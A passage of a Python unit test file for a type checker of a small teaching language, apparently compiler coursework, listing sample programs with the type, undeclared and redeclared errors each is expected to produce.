\"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"y\"),IntLiteral(1),BinaryOp(\"==\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+.\",Id(\"y\"),FloatLiteral(1.2)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,409))\n \n def test_410(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x\n Body:\n Var: y = 1; \n x = 1.0; \n main(y); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"y\")])))\n self.assertTrue(TestChecker.test(input,expect,410))\n \n def test_411(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x\n Body:\n Var: y = 1; \n main(y); \n x = 1.0; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(1.0))))\n self.assertTrue(TestChecker.test(input,expect,411))\n \n def test_412(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"Function: main \n Body:\n printStrLn(read(4));\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,412))\n \n def test_413(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallStmt(Id(\"printStrLn\"),[CallExpr(Id(\"read\"),[IntLiteral(4)])])]))])\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,413))\n \n def test_414(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"Function: main \n Body:\n printStrLn();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,414))\n \n def test_415(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallStmt(Id(\"printStrLn\"),[])]))])\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,415))\n \n def test_416(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallExpr(Id(\"foo\"),[])]))])\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,416))\n \n def test_417(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x,y,z,t,k\n Body:\n y= x + y \\ z * t;\n x= k % t;\n y= x == z;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),BinaryOp(\"==\",Id(\"x\"),Id(\"z\")))))\n self.assertTrue(TestChecker.test(input,expect,417))\n \n def test_418(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main \n Parameter: global_var\n Body:\n global_var = 25+6-.2.5%3\\100 ; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"%\",FloatLiteral(2.5),IntLiteral(3))))\n self.assertTrue(TestChecker.test(input,expect,418))\n \n def test_419(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: a[1][2]= {{1,2}};\n Function: main\n Parameter: x\n Body:\n a[1][2] = x;\n x[1] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"x\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,419))\n \n def test_420(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n a=b;\n a[5]=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"a\"),[IntLiteral(5)]),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,420))\n \n def test_421(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n b={1.,2.,3.,4.,5.};\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,421))\n \n def test_422(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[4]= {1,2,3,4};\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,422))\n \n def test_423(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n Var:c;\n c = b[5] +. 1;\n a=b; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",ArrayCell(Id(\"b\"),[IntLiteral(5)]),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,423))\n \n def test_424(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5],b[5];\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,424))\n \n def test_425(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Var: x[5]={1,2};\n Var: x=1;\n Function: main\n Body:\n EndBody. \n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,425))\n \n def test_426(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x;\n Function: main\n Body:\n Var:x;\n Var:main;\n Var:x[5]={1,2,3,4,5};\n EndBody.\n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,426))\n \n def test_427(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n EndBody.\n Function: main\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(Redeclared(Function(),\"main\"))\n self.assertTrue(TestChecker.test(input,expect,427))\n \n def test_428(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x\n Body:\n Var:x;\n EndBody.\n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,428))\n \n def test_429(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x,x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(Redeclared(Parameter(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,429))\n \n def test_430(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x;\n Function: main\n Parameter: x\n Body:\n x=foo;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,430))\n \n def test_431(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n foo();\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,431))\n \n def test_432(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x,y,a\n Body:\n y = a +foo(x);\n EndBody.\n\n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"y\"),BinaryOp(\"+\",Id(\"a\"),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n self.assertTrue(TestChecker.test(input,expect,432))\n \n def test_433(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: x,y;\n x=y;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,433))\n \n def test_434(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n If (foo(x)) Then\n x=1;\n EndIf.\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(CallExpr(Id(\"foo\"),[Id(\"x\")]),[],[Assign(Id(\"x\"),IntLiteral(1))])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,434))\n \n def test_435(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x,y\n Body:\n EndBody.\n\n Function: main\n Body:\n Var:x=1,y;\n foo(x,y);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(CallStmt(Id(\"foo\"),[Id(\"x\"),Id(\"y\")])))\n self.assertTrue(TestChecker.test(input,expect,435))\n \n def test_436(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n x = 1 + foo(x);\n EndBody. \n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),BinaryOp(\"+\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n self.assertTrue(TestChecker.test(input,expect,436))\n \n def test_437(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \nFunction: main\nBody:\n Var:x;\n If x Then\n Var:y;\n EndIf.\nEndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(Id(\"x\"),[VarDecl(Id(\"y\"),[],None)],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,437))\n \n def test_438(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n If x Then\n x=1;\n Else\n Var:y,z;\n y=x;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,438))\n \n def test_439(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: i , x;\n For (i = 1, i <= x*x,i*i+.1.5)\n Do x=x+1;\n EndFor.\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",BinaryOp(\"*\",Id(\"i\"),Id(\"i\")),FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,439))\n \n def test_440(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var: x;\n For (x=1, x>1 , x+1) Do\n Var:y;\n EndFor.\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(For(Id(\"x\"),IntLiteral(1),BinaryOp(\">\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)),([VarDecl(Id(\"y\"),[],None)],[]))))\n self.assertTrue(TestChecker.test(input,expect,440))\n \n def test_441(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n While (foo(x))\n Do\n x=1;\n EndWhile.\n EndBody.\n \n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(While(CallExpr(Id(\"foo\"),[Id(\"x\")]),([],[Assign(Id(\"x\"),IntLiteral(1))]))))\n self.assertTrue(TestChecker.test(input,expect,441))\n \n def test_442(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x,y;\n While (x)\n Do\n Var:z;\n y=1;\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(While(Id(\"x\"),([VarDecl(Id(\"z\"),[],None)],[Assign(Id(\"y\"),IntLiteral(1))]))))\n self.assertTrue(TestChecker.test(input,expect,442))\n \n def test_443(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Parameter: x\n Body:\n x= 1+foo(1);\n foo(1);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,443))\n \n def test_444(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n foo(1);\n x= 1+foo(1);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",IntLiteral(1),CallExpr(Id(\"foo\"),[IntLiteral(1)]))))\n self.assertTrue(TestChecker.test(input,expect,444))\n \n def test_445(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n EndBody.\n Function: main\n Body:\n Var:x,y;\n x= y + foo(1,2);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[IntLiteral(1),IntLiteral(2)])))\n self.assertTrue(TestChecker.test(input,expect,445))\n \n def test_446(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n Do\n Var:y;\n While x\n EndDo.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Dowhile(([VarDecl(Id(\"y\"),[],None)],[]),Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,446))\n \n def test_447(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x=1;\n If x Then\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"x\"),[],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,447))\n \n def test_448(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1;\n For (x = !True, x>1 , 0+1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),UnaryOp(\"!\",BooleanLiteral(True)),BinaryOp(\">\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"+\",IntLiteral(0),IntLiteral(1)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,448))\n \n def test_449(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x,y=0.5;\n For (x=1, x>1 , y +. 1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",Id(\"y\"),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,449))\n \n def test_450(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n For (x=1, 1+1 , x+1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"+\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,450))\n \n def test_451(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1,y;\n While (x)\n Do\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(While(Id(\"x\"),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,451))\n \n def test_452(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1,y;\n Do\n While (x)\n EndDo.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Dowhile(([],[]),Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,452))\n \n def test_453(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Body:\n EndBody.\n Function: main\n Body:\n Var:x;\n foo();\n foo()[1] = x+1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(CallExpr(Id(\"foo\"),[]),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)))))\n self.assertTrue(TestChecker.test(input,expect,453))\n \n def test_454(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Body:\n EndBody.\n Function: main\n Body:\n Var:x;\n foo();\n x = foo();\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),CallExpr(Id(\"foo\"),[]))))\n self.assertTrue(TestChecker.test(input,expect,454))\n \n def test_455(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n foo();\n EndBody.\n Function: foo\n Body:\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,455))\n \n def test_456(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:x;\n x = 1+foo();\n EndBody.\n Function: foo\n Body:\n Return 1.5;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,456))\n \n def test_457(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var: x;\n If x Then\n Return 1;\n Else\n Return 1.5;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,457))\n \n def test_458(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Body:\n Var: x;\n foo(1,2);\n x = foo(5,99);\n Return 0;\n EndBody.\n Function: foo\n Parameter: x1, x2\n Body:\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),CallExpr(Id(\"foo\"),[IntLiteral(5),IntLiteral(99)]))))\n self.assertTrue(TestChecker.test(input,expect,458))\n \n def test_459(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n Return x;\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,459))\n \n def test_460(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: a[1][2];\n a[1+1][0.5+.1.5] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[BinaryOp(\"+\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+.\",FloatLiteral(0.5),FloatLiteral(1.5))])))\n self.assertTrue(TestChecker.test(input,expect,460))\n \n def test_461(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: a[1][2];\n a[1][2][3] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[IntLiteral(1),IntLiteral(2),IntLiteral(3)])))\n self.assertTrue(TestChecker.test(input,expect,461))\n \n def test_462(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: n\n Body:\n Var : x[1][2]={{1,2}} ;\n Return x;\n EndBody.\n \n\n Function: main\n Body:\n Var:x;\n foo(x)[x+3][0.5]=1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"+\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,462))\n \n def test_463(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Var: x;\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact (n - 1);\n EndIf.\n EndBody.\n Function: main\n Body:\n x = 10;\n fact(x);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"fact\"),[Id(\"x\")])))\n self.assertTrue(TestChecker.test(input,expect,463))\n \n def test_464(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: a[5], b\n Body:\n Var: i;\n While (i < 5) Do\n a[i] = b +. 1.0;\n i = i + 1;\n EndWhile.\n i= 0.5;\n EndBody.\n Function: main\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"i\"),FloatLiteral(0.5))))\n self.assertTrue(TestChecker.test(input,expect,464))\n \n def test_465(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:a[5]={1,2,3,4,5};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n a[3 + foo(2)] = a[b[2][3]] +. 4.0;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,465))\n \n def test_466(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x,y\n Body:\n foo (2 + x, 4. \\. y);\n foo(x,y);\n EndBody. \n Function: main\n Body:\n foo(3,6);\n EndBody. \n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(3),IntLiteral(6)])))\n self.assertTrue(TestChecker.test(input,expect,466))\n \n def test_467(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n If True Then\n ElseIf True Then\n Var: a;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(BooleanLiteral(True),[],[]),(BooleanLiteral(True),[VarDecl(Id(\"a\"),[],None)],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,467))\n \n def test_468(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n For (a = 1, a < 10, 1) Do\n Var:a=1;\n EndFor.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,468))\n \n def test_469(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: a[3]={\"Mot\",\"2\",\"Three\"};\n Function: main\n Body:\n a[1] = a[1] + a[2];\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",ArrayCell(Id(\"a\"),[IntLiteral(1)]),ArrayCell(Id(\"a\"),[IntLiteral(2)]))))\n self.assertTrue(TestChecker.test(input,expect,469))\n \n def test_470(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:a,b,c,d;\n a = a + b || c - d;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"||\",BinaryOp(\"+\",Id(\"a\"),Id(\"b\")),BinaryOp(\"-\",Id(\"c\"),Id(\"d\")))))\n self.assertTrue(TestChecker.test(input,expect,470))\n \n def test_471(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: sum = 0, a = 1;\n While a < 10 Do\n Var: b, cal = 1;\n While b < 10 Do\n cal = cal * b;\n b = b + 1;\n EndWhile.\n sum = sum + prod;\n a = a + 1;\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"prod\"))\n self.assertTrue(TestChecker.test(input,expect,471))\n \n def test_472(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Body: \n Var: a=1,x; \n a=foo(x); \n EndBody. \n\"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,472))\n \n def test_473(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:x;\n If True Then\n x = 3;\n Else \n x = 2.0;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(2.0))))\n self.assertTrue(TestChecker.test(input,expect,473))\n \n def test_474(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x =1;\n Function: main\n Parameter: y\n Body:\n x = y + main(0.5) ;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"main\"),[FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,474))\n \n def test_475(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x =1;\n Function: main\n Parameter: y\n Body:\n x = main(0.5) + y;\n EndBody. \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",CallExpr(Id(\"main\"),[FloatLiteral(0.5)]),Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,475))\n \n def test_476(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n Var:y;\n Do\n x=1;\n main(0.5);\n While y \n EndDo.\n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,476))\n \n def test_477(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x, a, b, c\n Body:\n If(x == ((False||True) && (a > b + c))) Then\n a = b - c;\n Else\n a = b + c;\n x = True;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"==\",Id(\"x\"),BinaryOp(\"&&\",BinaryOp(\"||\",BooleanLiteral(False),BooleanLiteral(True)),BinaryOp(\">\",Id(\"a\"),BinaryOp(\"+\",Id(\"b\"),Id(\"c\")))))))\n self.assertTrue(TestChecker.test(input,expect,477))\n \n def test_478(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[2][3][4];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2.;\n EndBody.\n Function: main\n Body:\n Var: z[2][3][4] = {1.,2.};\n Var: w[2] = {3.,4.};\n Var: x;\n abc = z;\n foo(x);\n EndBody. \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"abc\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,478))\n \n def test_479(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[5];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2;\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3.,4.};\n Var: x;\n abc[1] = 1;\n foo(z);\n foo(w);\n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"w\")])))\n self.assertTrue(TestChecker.test(input,expect,479))\n \n def test_480(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[5];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2;\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3,4};\n Var: x;\n abc[1] = 1.5; \n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"abc\"),[IntLiteral(1)]),FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,480))\n \n def test_481(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x[2]\n Body:\n EndBody.\n Function: main\n Body:\n Var: z[2] = {1,2};\n Var: w[2] = {3,4};\n Var: x;\n foo(z);\n foo(w[2]);\n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[ArrayCell(Id(\"w\"),[IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,481))\n \n def test_482(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n y= x + main(0.5);\n\n EndBody. \"\"\"\n expect = str(Undeclared(Identifier(),\"y\"))\n self.assertTrue(TestChecker.test(input,expect,482))\n \n def test_483(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main \n Body:\n If True Then\n Var: a;\n Var: x;\n Var: y;\n x = 1;\n y = 2;\n z = 3;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"z\"))\n self.assertTrue(TestChecker.test(input,expect,483))\n \n def test_484(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:i;\n For (i = 6*9,True, i-1) Do\n Var:x=5;\n a=3;\n EndFor.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,484))\n \n def test_485(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Body:\n Var: x[5];\n If True Then\n While True Do\n Return x;\n EndWhile.\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,485))\n \n def test_486(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:x;\n While x>1 Do\n If x==1 Then Return;\n EndIf.\n EndWhile.\n Return True;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(BooleanLiteral(True))))\n self.assertTrue(TestChecker.test(input,expect,486))\n \n def test_487(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: n\n Body: \n Var:a;\n Do \n Var:b;\n Do\n While(b!=4)\n EndDo.\n While(a!=3) \n EndDo.\n a=1.0;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),FloatLiteral(1.0))))\n self.assertTrue(TestChecker.test(input,expect,487))\n \n def 